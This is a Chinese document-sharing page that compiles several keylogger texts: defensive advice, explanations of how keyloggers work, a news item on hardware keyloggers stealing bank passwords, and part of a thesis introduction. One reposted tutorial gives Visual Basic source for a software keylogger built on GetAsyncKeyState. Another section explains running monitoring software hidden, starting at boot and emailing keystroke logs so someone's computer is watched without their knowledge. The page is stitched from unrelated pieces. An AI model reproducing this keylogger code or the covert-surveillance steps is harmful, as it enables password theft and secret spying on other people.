计算机键盘记录器
如何识别和避免网络间谍软件和键盘记录器
如何识别和避免网络间谍软件和键盘记录器在当今信息时代,网络安全问题变得越来越重要。
网络间谍软件和键盘记录器是常见的网络安全威胁,它们可以在用户不知情的情况下收集个人信息并造成严重影响。
为了保护用户的隐私和数据安全,我们需要学会识别和避免这些潜在的威胁。
一、网络间谍软件的识别和避免网络间谍软件,也称为间谍软件或间谍病毒,是一种具有监控、窃取个人信息和记录用户活动的恶意软件。
下面是识别并避免网络间谍软件的几个关键步骤:1. 安装可信赖的安全防护软件:选择知名的杀毒软件和防火墙程序,并保持其更新。
这些软件能够及时发现和拦截潜在的网络间谍软件。
2. 警惕来路不明的软件和附件:避免从非官方或不可信的来源下载软件。
在安装过程中,注意审查软件的权限请求和隐私政策,拒绝授权过多权限。
3. 定期更新操作系统和应用程序:软件厂商会不断发布安全更新和补丁,及时更新可以修复一些已知的漏洞,提高系统的安全性。
4. 注意识别可疑链接和广告:网络间谍软件常常通过钓鱼链接和具有欺骗性的广告来感染用户。
留意与正常网页内容不符的链接和窗口,避免点击来路不明的链接。
5. 定期扫描电脑系统:使用安全软件进行全盘扫描,确保计算机系统没有潜藏的网络间谍软件。
二、键盘记录器的识别和避免键盘记录器是一种硬件或软件设备,可以记录用户在键盘上的击键信息。
攻击者可以通过键盘记录器获取登录凭证和其他敏感信息。
以下是识别和避免键盘记录器的方法:1. 检查物理键盘:在使用公共设备或外部键盘前,仔细检查物理键盘上是否安装了可疑的装置。
键盘记录器通常会伪装成USB插头或其他外部设备。
2. 使用虚拟键盘:虚拟键盘是计算机屏幕上的软件键盘,可以通过鼠标点击进行输入。
使用虚拟键盘可以绕过大部分键盘记录器。
3. 防止远程访问:远程访问软件是常见的键盘记录器的潜在来源。
确保关闭并禁用不需要的远程访问服务,并且设置强密码以减少入侵的可能性。
4. 及时更新系统和应用程序:更新操作系统和应用程序可以修复已知的漏洞,提高系统的安全性。
keylogger原理
keylogger原理Keylogger, also known as a keyboard logger or system monitor, is a type of surveillance software that records every keystroke made on a computer. Its primary purpose is to capture sensitive information such as passwords, usernames, and other personal data entered by users. The keylogger operates by intercepting and logging keystrokes at the hardware or software level, depending on its implementation.键盘记录器,也称为键盘记录器或系统监视器,是一种监控软件,用于记录计算机上的每个击键。
其主要目的是捕获用户输入的敏感信息,如密码、用户名和其他个人数据。
键盘记录器通过在硬件或软件层面拦截并记录击键来实现其功能,具体取决于其实现方式。
At the hardware level, a keylogger may be physically installed inside a computer's keyboard or connected externally through a USB device. These devices capture the keystrokes directly from the keyboard's circuitry, making them undetectable by standard antivirus software. However, they require physical access to the target computer for installation, which can be challenging in certain scenarios.在硬件层面,键盘记录器可能被物理安装在计算机的键盘内部或通过USB 设备外部连接。
可盗取密码的键盘记录器
可盗取密码的键盘记录器作者:来源:《大众科学》2013年第12期外观不起眼酷似U盘在使用电脑时,很少有人会去查看主机箱背后的情况,即便发现在键盘线和主机之间,连接了一个酷似U盘的东西,一般人也很容易将它认作是某种插口转换器。
然而据调查,这就是近来引起大家广泛讨论的“键盘记录器”。
键盘记录器连接在键盘线和主机之间,外形酷似U盘,可储存三个月到一年甚至更长时间范围内的键盘动作。
它即插即用,无需任何设定,事后把它插入另一台电脑,所记下的信息就会尽收眼底。
比如,当你使用装有键盘记录器的电脑,在用键盘输入银行卡密码后,如果这个记录器是不法分子蓄意安装的,你的银行卡密码就会被盗取。
当你去公共场所上网,看到这种键盘记录器连接到你的键盘线上面,请千万不要使用这台电脑。
这种键盘记录器可以记录上网人所有的键盘操作,如QQ、支付宝密码,同样也可以记录你的银行帐号及密码,经常使用公共电脑的人千万不可掉以轻心!隐蔽性高可记录键盘操作当键盘记录器接入电脑之后,系统没有任何新硬件提示,安全软件也没有任何反应,也没有新U盘提示。
然后,按说明操作启用后,这个物件就把所有键盘的输入内容都记下来了,并且以记事本的格式存在所使用的电脑上。
这不是“键盘记录器”第一次引发网友关注。
此外,通过网络检索“键盘记录器”,也的确可以发现很多相关产品的信息,甚至还有说法称,“键盘记录器”本来是用于家长监控孩子使用电脑的。
不过,如前述网友所言,以前提到“键盘记录器”多是类似木马程序那样的软件,而且往往会有杀毒软件监测提示,相比之下这个硬件设备“明显隐蔽性高多了”。
据调查,利用“键盘记录器”作案的案例已在温州出现,当时盗取到了事主的淘宝账户密码,造成一定损失,这也引起了警方重视。
无论键盘记录器被用作何种途径,至少目前来说,它的生产是不合法的。
它的技术含量并不高,一般国内的小厂家甚至小作坊都能生产出来,自然也就没有办理任何手续,更谈不上有什么品牌。
目前,键盘记录器大部分零零散散地私下售卖,形不成一定规模,监管就相对困难。
[转载]手把手教你做键盘记录器
![[转载]手把手教你做键盘记录器](https://img.taocdn.com/s3/m/5e6da910effdc8d376eeaeaad1f34693daef103f.png)
[转载]手把手教你做键盘记录器[转载]手把手教你做键盘记录器信息来源:网络安全文章系统前几天写了一篇键盘记录器,好多人反映看不懂,对新人没什么用处,所以且这篇我会写的很详细,再也不像那篇,出了代码什么也没 ^!^这个程序将会详细的讲解如何记载键盘的每一次输入。
下面介绍的这个程序主要是利用GetAsyncKeyState函数,使用GetAsyncKeyState可以获得键盘的动作。
GetAsyncKeyState函数根据虚拟键表判断按键的类型。
返回值为一个16位的二进值数,如果被按下则最高位为1,即返回-32767。
下面是API函数及鼠标中左右键在虚拟键表中的定义:Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer好了,函数就先介绍这么多,下面开始动手实战了first,当然是创建窗口了在时间控件的Timer时间中定义检查按键类型,代码如下:Dim AddKeyKeyResult = GetAsyncKeyState(13) ‘回车键If KeyResult = -32767 ThenAddKey = "[ENTER]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(17) ‘Ctrl键If KeyResult = -32767 ThenAddKey = "[CTRL]"GoTo KeyFoundEnd IfKeyRe sult = GetAsyncKeyState(8) ‘退格键If KeyResult = -32767 ThenAddKey = "[BKSPACE]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(9)If KeyResult = -32767 ThenAddKey = "[TAB]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(18)If KeyResult = -32767 ThenAddKey = "[ALT]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(19)If KeyResult = -32767 ThenAddKey = "[PAUSE]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(20)AddKey = "[CAPS]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(27) If KeyResult = -32767 Then AddKey = "[ESC]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(33) If KeyResult = -32767 Then AddKey = "[PGUP]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(34) If KeyResult = -32767 Then AddKey = "[PGDN]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(35) If KeyResult = -32767 Then AddKey = "[END]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(36)AddKey = "[HOME]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(44) If KeyResult = -32767 Then AddKey = "[SYSRQ]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(45) If KeyResult = -32767 Then AddKey = "[INS]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(46) If KeyResult = -32767 Then AddKey = "[DEL]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(144) If KeyResult = -32767 Then AddKey = "[NUM]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(37)AddKey = "[LEFT]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(38) If KeyResult = -32767 Then AddKey = "[UP]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(39) If KeyResult = -32767 Then AddKey = "[RIGHT]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(40) If KeyResult = -32767 Then AddKey = "[DOWN]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(112) If KeyResult = -32767 Then AddKey = "[F1]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(113) If KeyResult = -32767 Then AddKey = "[F2]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(114) If KeyResult = -32767 Then AddKey = "[F3]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(115) If KeyResult = -32767 Then AddKey = "[F4]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(116) If KeyResult = -32767 Then AddKey = "[F5]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(117) If KeyResult = -32767 Then AddKey = "[F6]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(118) If KeyResult = -32767 Then AddKey = "[F7]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(119) If KeyResult = -32767 Then AddKey = "[F8]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(120) If KeyResult = -32767 Then AddKey = "[F9]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(121) If KeyResult = -32767 Then AddKey = "[F10]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(122) If KeyResult = -32767 Then AddKey = "[F11]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(123) If KeyResult = -32767 Then AddKey = "[F12]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(124) If KeyResult = -32767 Then AddKey = "[F13]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(125) If KeyResult = -32767 Then AddKey = "[F14]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(126) If KeyResult = -32767 Then AddKey = "[F15]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(127) If KeyResult = -32767 Then AddKey = "[F16]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(32) If KeyResult = -32767 Then AddKey = " "GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(186) If KeyResult = -32767 Then AddKey = ";"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(187) If KeyResult = -32767 Then AddKey = "="GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(188) If KeyResult = -32767 Then AddKey = ","GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(189) If KeyResult = -32767 Then AddKey = "-"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(190) If KeyResult = -32767 Then AddKey = "."GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(191) If KeyResult = -32767 Then AddKey = "/" ‘/GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(192) If KeyResult = -32767 Then AddKey = "`" ‘`GoTo KeyFoundEnd If‘----------NUM PADKeyResult = GetAsyncKeyState(96) If KeyResult = -32767 Then AddKey = "0"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(97) If KeyResult = -32767 ThenAddKey = "1"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(98) If KeyResult = -32767 Then AddKey = "2"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(99) If KeyResult = -32767 Then AddKey = "3"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(100) If KeyResult = -32767 Then AddKey = "4"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(101) If KeyResult = -32767 Then AddKey = "5"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(102) If KeyResult = -32767 Then AddKey = "6"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(103) If KeyResult = -32767 Then AddKey = "7"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(104) If KeyResult = -32767 Then AddKey = "8"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(105) If KeyResult = -32767 Then AddKey = "9"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(106) If KeyResult = -32767 Then AddKey = "*"End IfKeyResult = GetAsyncKeyState(107) If KeyResult = -32767 Then AddKey = "+"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(108) If KeyResult = -32767 Then AddKey = "[ENTER]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(109) If KeyResult = -32767 Then AddKey = "-"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(110) If KeyResult = -32767 Then AddKey = "."GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(2) If KeyResult = -32767 Then AddKey = "/"End IfKeyResult = GetAsyncKeyState(220)If KeyResult = -32767 ThenAddKey = "\"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(222)If KeyResult = -32767 ThenAddKey = "‘"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(221)If KeyResult = -32767 ThenAddKey = "]"GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(219)If KeyResult = -32767 ThenAddKey = "["GoTo KeyFoundEnd IfKeyResult = GetAsyncKeyState(16) ‘shift键If KeyResult = -32767 And TimeOut = 0 ThenAddKey = "[SHIFT]"LastKey = AddKeyTimeOut = 1GoTo KeyFoundEnd IfKeyLoop = 41Do Until KeyLoop = 256 ‘ 显示其他键KeyResult = GetAsyncKeyState(KeyLoop)If KeyResult = -32767 Then Text1.Text = Text1.Text + Chr(KeyLoop)KeyLoop = KeyLoop + 1LoopLastKey = AddKeyExit SubKeyFound: ‘显示键的信息Text1 = Text1 & AddKeyEnd Sub上面的()里面的数字实际是就是那些键的Ascii码,比如13就代表回车,17代表Ctrl,……由于数目太多,一一列举不方便现提供Ascii表一份供对照下面是其他的事件Private Sub Timer2_Timer()TimeOut = 0End Sub目的是随时刷新清空。
鼠标键盘记录器介绍
鼠标键盘记录器介绍什么是鼠标键盘记录器呢?相信大家对此也不是很熟悉吧,小编就在此为大家描述鼠标键盘记录器的介绍及功能,让大家了解鼠标键盘记录器。
全能鼠标键盘记录器软件介绍:功能十分强大的脚本记录工具,可以记录您的鼠标\键盘操作的所有动作,包括鼠标的单击,双击,拖动,键盘击键,各种组合键等. 记录后可以在您以后需要的时候随时进行回放,在一些需要重复操作的场合特别有用,可以有效的节省您的时间,提高您的工作效率,如:企事业单位处理表格时进行的一些重复计算的操作,游戏里的一些练功过程,简化一些软件里的复杂操作,甚至可以做为一种辅助教学工具在计算机教育中使用,给学员演示一些软件的操作过程.详细功能:非常易于使用秉承丝茅草软件的以用户为中心的设计理念,鼠标键盘记录器从各方面考虑了用户的使用习惯和方便性,动画图标式的功能操作方式让新手也能在最短时间内轻松上手。
录制范围广支持各种鼠标及键盘操作的记录,包括滚轮鼠标的滚轮动作。
录制范围可设置,非常灵活以选择录制脚本的范围是否仅录制键盘或是鼠标,及是否记录击键延时、是否记录普通鼠标移动过程等等。
支持热键播放,方便实用每个脚本都可以设置一个对应的热键,一键操作,非常简单方便,特别允许多个脚本使用同一个热键,软件会弹出窗口给用户选择。
方便的脚本编辑功能对于录制的脚本可以进行任意编辑,可以在脚本中加入一些控制命令(这些控制命令无法在录制时产生),这个功能仅在增强版和企业版中有效,标准版不含这个功能。
支持数据库做为输入源可以将某一数据库中的数据做为输入的数据源,这对于录入数据的场合特别有用,这个功能仅在企业版中有效,标准版和增强版不含这个功能。
特别支持快速脚本快速脚本是为需要更简单的一些场合设置的,一键即可开始录制,完成录制后随时一键开始播放,使用极为简单,快速脚本同样可以在需要的时候保存为普通脚本。
支持脚本的密码保护支持脚本密码保护,不知道密码的情况下将无法对脚本进行修改和回放。
键盘记录原理
键盘记录原理
键盘记录原理是指记录用户在计算机键盘上的输入活动。
当用户在键盘上按下一个键时,键盘会发送一个信号给计算机,计算机会将该信号转换成相应的字符。
键盘记录可以通过软件或硬件实现。
在软件记录的情况下,计算机上安装了特殊的记录程序,它们可以截获键盘输入并将其存储或发送到指定的位置。
这种软件可以在计算机的后台运行,通常不会被用户察觉。
另一种实现键盘记录的方法是通过硬件记录器。
这些记录器通常安装在计算机的键盘连接线上,并在键盘和计算机之间插入。
通过这种方式,记录器可以记录键盘输入并将其保存在本地存储器或发送到远程位置。
键盘记录器的目的有多种,包括监控员工的工作活动、监测儿童的互联网使用、进行调查或收集证据等。
然而,键盘记录也可能被用于非法目的,例如窃取账户信息、密码或其他敏感信息。
为了保护个人隐私和防止键盘记录的滥用,用户可以采取一些措施。
首先,定期更新和运行安全防护软件以确保计算机没有安装恶意记录程序。
其次,避免在公共场所或不可信的计算机上键入敏感信息。
最后,应使用强密码,并避免在多个网站上使用相同的密码。
总之,键盘记录是一种记录用户键盘输入的技术,可以通过软
件或硬件实现。
它可以用于多种目的,但也可能被滥用。
为了保护个人隐私,用户应采取相应的安全措施。
预防键盘记录器小技巧
预防键盘记录器小技巧
大家都知道现在木马相当猖獗,其中以盗窃用户QQ帐号密码、网游帐号密码、甚至是网银账户密码的盗号木马最为猖獗。
这类木马都有一个共同性就是都自带了一个叫做键盘记录器的组件,正是键盘记录器的组件完成了这些木马盗号的核心工作--获得密码帐号,再由木马的发送功能将这些帐号密码信息发送给黑客。
那么什么才是键盘记录器呢?其能记录我们帐号密码的原理是什么呢?
其实键盘记录器就是一个驻存在内存的一个内存监控程序,用户敲击键盘的每一个按键都会存在内存中的一个特定地址区域(键盘缓冲区),用队列的形式将其存放在内存中,然后按着敲击顺序再输入到系统中(这一点用户可以在有时CPU占用100%机器反应很慢时打字可以看出来)。
而键盘记录器正是一个在内存中读取这些存放在键盘缓冲区数据,并记录的一个工具。
以前有网友在网上发帖称在输入帐号和密码时打乱他们的输入顺序,比如你要输入的号码为:2986531 ,我们输入时先输入531接着再移动光标到531前再输入2986,就可避免自己的密码和帐号被键盘记录器所记录,其实这种方法并不能有效的预防键盘记录器,现在的键盘记录器都具读取整个键盘缓冲区的能力,他能将你的所有输入包括光标移动都进行记录,通过记录就能还原出你输入的真实数字。
真正要预防键盘记录器一定要使用一些专业工具,比如360保险箱,金山密保等软件来保护你要输入密码的文件防止键盘记录器进行监控。
另外你也可以使用QQ等自带的软键盘进行输入,这些都是能有效避免键盘记录器的好办法。
出现大量的相关漏洞攻击软件和利用该0day(零日)漏洞传播或破坏的病毒和木马。
前面所说的IE70day 漏洞之所以没夸张成“数亿网民的定时炸弹”原因就在于此。
键盘记录器怎么使用
键盘记录器怎么使用大家想知道别人在你的电脑上输入过什么东西吗?那就必须为大家介绍键盘记录器这款软件了。
下面由店铺教大家怎么使用键盘记录器键盘记录器的使用方法1 首先运行本目录下的keyboardlog.exe,然后点"开起监控",注意这个程序只要运行一次就可以了,以后开机的时候自动运行。
2 如果不想运行这个程序,请执行"停止监控". 键盘记录器解压之后打开键盘记录器有个 keyboardlog.exe文件双击他会出现开启监控停止监控还有退出你点开启监控就行了看记录的时候哦一般默认路径是c:logofkey.txt 要是想改路径的话键盘记录器的文件夹里有一个 config.ini 文本文件打开之后在那里吧路径改了就好了机器重新启动也照样能记录电脑监控专家不仅可以记录所有的键盘输入,进行QQ聊天,MSN聊天记录的查看和上网监控,并且对电脑屏幕进行定时拷屏,对打开窗口和浏览的网站进行记录。
你还可以禁止打开指定的窗口和程序、禁止运行聊天软件,下载软件(迅雷、BT等)和游戏软件等。
如果尝试打开或运行这些被你禁止的窗口和程序会被立即关闭并记录下来。
另外,软件还可以把所有监控的信息(键盘输入记录,屏幕截图等)发送到你指定的邮箱,让你轻松实现网络监控。
本软件安装后,不留任何痕迹,并且采用热键启动的办法,让你在神不知,鬼不觉的情况下监控你想监控的电脑。
简单键盘记录器的使用打开简单键盘记录器之后是一个相当简洁的界面,该软件的一些主要功能都有选项或者快捷键可用,用户可以根据自己的需要配置属于自己的键盘记录器。
图2.简单键盘记录器主界面要想用好一款软件,首先要根据自身情况对这款软件进行一些个性化的配置,如果您出门在外又想知道别人用你的电脑做了什么的话,可以选择“系统启动时自动启动”和“隐藏运行界面”这两个选项,下次电脑重新启动之后简单键盘记录器就会在后台忠实的记录下电脑键盘所输入的信息了。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
研究背景、目的和意义1.1.1.键盘记录器的研究背景计算机键盘记录器,是当前发展较为成熟的一款软件,它可以将用户通过键盘输入的信息准确无误的记录下来,保存到相应的文档中。
科学技术作为一把双刃剑,对人类的发展、生产、生活既有积极的推动作用,又有消极的阻碍,甚至破坏作用。
同样,键盘记录器也有着利与弊的双重属性。
一方面,键盘记录器是网络管理员的好帮手。
作为网络管理员,一款好的系统控制软件可以帮助其高效的完成其下众多主机的日常管理工作,而键盘记录器是控制软件不可缺少的部分,管理员可以在主机出错或故障时,通过键盘记录器记录的内容分析故障来源,同时也可以监控主机动向,确保其不被外来人员非法使用,保证了信息的安全。
另一方面,键盘记录器也是威胁信息安全的重大作案者之一。
网络上流行的木马中,很多都带有键盘记录的功能,用以盗取用户的敏感信息,如一些重要的账号密码,使用户造成损失。
值得一提的是,近年来,由于网络及网络技术的普及,高技术信息战在国与国之间,集团与集团之间,企业与企业之间广泛展开。
许多组织使用键盘记录器等高端手段盗取国家情报,商业机密,科学前沿成果等,这给被攻击一方造成的损失是巨大的。
也正是因此,键盘记录技术也得到一些组织的支持,使其技术含量迅速提高。
信息安全面临严峻挑战。
在当今计算机和计算机网络迅速普及,信息技术蓬勃发展的环境下,研究键盘记录技术,是为了更好的发展和完善这项技术,将它推向更高的技术层面,方便用户的使用;着眼于信息安全的角度考虑,更彻底的研究键盘记录技术是为了日后更好的预防它,保证用户敏感信息的安全,最大程度保护用户隐私。
这也体现出了对抗理论中知己知彼,欲懂防御必先懂进攻的道理。
我们了解,计算机诞生于国外,国内的计算机技术的研究起步和发展较晚,许多新技术都是在国外诞生的现状尚未改变。
同样,键盘记录技术也是产生于国外,这使得基于英文字母和符号输入的键盘记录技术已经非常成熟,而除英文以外的其他文字的记录还有待完善和发展。
汉语作为世界上使用最多的语言,另外,近年来中国的发展和国际威望的提高使得中文在世界范围的普及也随之扩大,这就对中文键盘记录的发展提出了更迫切的要求。
从以上得出,无轮是出于力争技术前沿的理想,还是键盘记录技术随发展而需完善和提高的需求,研究计算机键盘记录技术是极有意义的。
另外发生在去年的腾讯与360之争,爆出了安全软件公司内部一些黑箱操作,这使得平时对安全软件完全信赖的用户们开始重新审视它。
同时,也让人们真真切切的感受到了连接到网络的主机中的用户信息的保护正遭受巨大挑战。
在本文中,作者意在设计和实现一款能够同时记录英文和中文的键盘记录系统,内容主要包括:中文信息记录、纯英文字符记录、Windows当前窗体识别技术以及整个键盘记录系统设计与实现。
1.2研究历史、现状及分析1.2.1键盘记录的国内外研究现状及分析键盘记录器诞生于国外,一段时期内,其技术也是领先于国内,但是这些年键盘记录技术发展迅速,使得国内的研究也热情高涨,出现了五花八门的键盘记录系统,国内外技术水平也不相伯仲。
早在2007年瑞星公司就发表安全报告显示,2007年检测到计算机键盘记录事件数比2006年多65%,且全年检测到的网络安全事件有70%以上与键盘记录器相关。
这些年键盘记录器在盗取网络账号,盗取网银账号等方面颇为猖獗,造成用户损失数目巨大,也使得越来越多的大众用户对它有了了解。
国内外对于键盘记录器的研究一直是朝着两个方向发展:软件型键盘记录器和硬件型键盘记录器。
软件型键盘记录器一直是其发展的主流,也是人们所熟知的,相比而言,硬件型键盘记录器就较不常见些。
硬件型键盘记录技术[1](硬件型键盘记录器),其实是一种电子技术,它由一些电子器件组成,在键盘和I/O接口之间捕获键盘信息,这个器件在计算机系统上安装之后就可以把键盘输入的信息存储在内置的内存当中。
现在市场上也有一些这样的设备出售。
多数的设备是安装在键盘线的末端,有的也可以安装在计算机内部,例如I/O端口的内部,有的甚至安装在键盘自身内部。
这样的硬件型装置是不需要占用任何计算机资源的,基于这样的一个硬件的形式,所以它也不会被杀毒软件和扫描器检测出来。
它也不需要用到计算机的硬盘去存储所捕获的键盘信息,因为它有自身的内存,且一般大于2M。
这样的一个设备价值50~150美元,一些键盘产品还会被设计成自带键盘记录功能,有些在用户购买时甚至不告知实情,还有一些产品还支持蓝牙功能。
对比于软件型的键盘记录器,硬件型设备的不足是它必须物理安装到计算机的机箱或者键盘里面。
这样的键盘记录器,一旦被发现,就可以直接采用物理隔离破坏其功能,正因为此,此种键盘记录器才鲜为人知。
还有一种键盘记录器,它也是一种硬件型键盘记录设备。
它使用强大的编码体制,通过接受每一个按键被按下时引起的电磁脉冲,根据每个按键产生电磁脉冲的频率来编码和译码。
由不同的频率还原出键盘的击键过程。
这项技术在市场上较为罕见,且实现起来难度较大。
软件型键盘记录技术(软件型键盘记录器)是本文要设计和实现的系统,说到它,就不得不提到系统控制软件。
早期,计算机管理员为方便管理主机,开发出了众多的远程控制软件,在这些软件中,键盘记录一直作为一项基本功能包含在内。
可见早在远程控制软件被开发时,键盘记录系统就跟着被开发出来。
另外基于其监控功能,可以监控每一台计算机的使用情况而被大量应用于企业计算机监控中。
用以监控员工计算机,企业管理者能够从键盘记录的输出文件中发现员工使用计算机时的越权行为或者违规行为,这能够有效提高员工的工作效率,防止员工消极怠工,更能有效防范企业敏感信息被篡改或被窃取。
另外,在提高用户工作效率上,键盘记录器也是一款优秀的工具,如用户在输入过程中误删部分内容,通过键盘记录器可以快速的还原出来,使得用户的工作效率大大提高。
后来,键盘记录系统被大量的运用到木马、间谍软件等恶意软件或代码中,并发挥出强大的作用,其目的是为了盗取目标主机上对攻击者感兴趣的信息,以获得不法盈利。
国内比较有代表产品是冰河、PCshare、灰鸽子以及网银大盗。
冰河[2]开发于1999年,起初开发冰河也是想运用于系统管理和控制,后来被黑客们广泛地用作入侵工具,成为所谓的冰河木马,可见其功能之强大。
在1999年到2006年间,冰河可以说是国产木马中的霸主之一。
它采用C++builder编写,其集成的键盘记录功能,可以在系统开机时就开始执行键盘记录程序,可以记录绝大多数输入框下的账号密码输入。
2001年,作为冰河木马的后背,有过之而无不及的灰鸽子问世,灰鸽子[3]的出现最早是出于对冰河的一种模仿,后来迅速发展完善,它采用Delphi编写,它拥有的键盘记录功能与冰河相似,作为国产的一款著名后门软件,灰鸽子良好的隐藏性更受到黑客们的青睐,2007年灰鸽子停止更新。
同样具有键盘记录功能,PCshare是远程控制管理软件的典范,可以在内网和外网使用,极有超强的隐藏性和自我修复功能,其记录功能强大,可以同时记录中文和英文信息,后来加入的rootkit[4]技术,更是使得PCshare的反查杀能力如虎添翼。
今年4月起,各大银行网络支付平台纷纷降低了无U盾下网上银行普通支付方式的支付限额或者增加了手机短信认证或电话等认证机制,原因是近期网银交易的安全性收到威胁,网银大盗在这中间扮演了重要角色。
他同样具备强大的键盘记录功能,可以破解一般密码输入框的加密功能,甚至可以截取软键盘输入。
使无认证的网银支付危机重重。
键盘记录器发展到今日,早已不是单单一个键盘记录模块那么简单,作为盗取用户信息的木马,其还包括相当完善的其他部件,如自启动模块、隐藏模块、屏蔽防火墙或杀毒软件模块等等。
其使用的的技术也日新月异,在杀毒软件五花八门,品种繁多的今日,特别是360的云查杀系统更是将木马的生存空间大大压缩,然而作为木马为了更好的躲过安全软件检测,也绞尽脑汁,比如使用反弹端口[5]的方法,躲过防火墙的监控;使用rootkit 技术更好隐藏自身等。
据《2010年上半年中国互联网安全报告》显示,在2010年上半年检测到的木马前十名中,有七个木马具有键盘记录或信息盗取功能。
排名第一的劫持DLL盗号木马win32/Lmir.KB更是在短短半年内被检测到32388777次之多。
在键盘记录器不断发展的同时,其对手安全软件的发展也丝毫不落下脚步,常常是一种安全问题出现不久,随之而来的查杀工具便应运而生,木马病毒与安全软件的征战似乎永不休止。
比如奇虎360旗下一款名为账号保险柜的软件可以在指定软件启动前对计算机重要区域进行扫描,对键盘记录器的活动进行排查,确认安全后才放行,让软件运行下去。
1.2.2 中文输入法译码技术发展历史介绍汉语是世界上使用人口最多的一种语言,随着汉语的不断推广和传播,汉字的使用也日益广泛,不再仅局限于本国内。
另外,汉字也是世界上使用历史最悠久的文字之一,也是世界上唯一仍在使用的方块象形字。
自从计算机被发明以来,键盘就是以输入英语字母而设计的,最早的键盘是83键,后来发展到101键和104键。
目前为止,所有键盘上都是英文和数字表示,没有一个标准键盘天生就可以实现汉字的输入,这就是中文输入法产生的缘由。
由于汉字数目众多,不像英语单词那样只要26个英文字母就可以组成任意想要的单词,故不可能制作出这样一个键盘,只要按一个键就代表一个汉字的输入。
因此人们想出了给汉字编输入码的方法,用数个键组成的码序列来表示一个汉字,通过输入码从被编码的汉字中选中想要输入的汉字,这就是汉字的编码和译码。
而中文输入法的编码方法又可算是“万码奔腾”的过程,目前为止对汉字的编码方法已经有1000种以上。
中文输入法是指为了将汉字输入计算机或手机等电子设备而采用的编码方法,是中文信息处理的重要技术。
目前中文输入主要分为:键盘输入、手写输入、语音输入、扫描输入[6]。
下面一一简要介绍。
键盘输入目前仍是中文输入的主要方式,由于键盘是西方人的发明,各按键均是字母字符,所以中文键盘输入十分不便。
尽管汉字输入法(王码、肖码、钱码、郑码、杜码、智能码、表形码等)多达千种,但想要不经过培训或学习就想要随心所欲的输入汉字,以上没有一种输入法满足要求。
而后出现的,汉语拼音+智能输入的方法,勉强使得键盘输入变得稍微简单化,但是,现在国内很多地区的汉语拼音并不完全普及,并且很多人由于地方方言发音的影响,汉语拼音发音不标准,这又对汉字的输入构成一定的不便。
手写输入是最贴近自然的输入法,把文字写进计算机是人们多年的追求,并且在当前也得到很好的实现。
手写的实现有两种方法:使用手写设备,如慧笔和汉王笔;实用软件,如使用鼠标在配套软件下实现。
而且近几年,由于市场需要,手写输入技术迅速发展,识别技术不断提高,不仅能乱序识别笔画,连笔,还可以识别草书。